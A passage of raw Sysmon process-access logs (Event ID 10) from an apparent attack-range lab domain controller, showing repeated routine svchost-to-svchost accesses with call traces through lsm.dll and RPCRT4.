C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.192","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2429,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.192\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.192","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2430,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.192\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.192","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2431,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.192\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.192","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2432,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.192\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.192","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2433,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.192\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.192","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2434,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.192\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.192","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2435,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.192\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.192","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2436,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.192\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 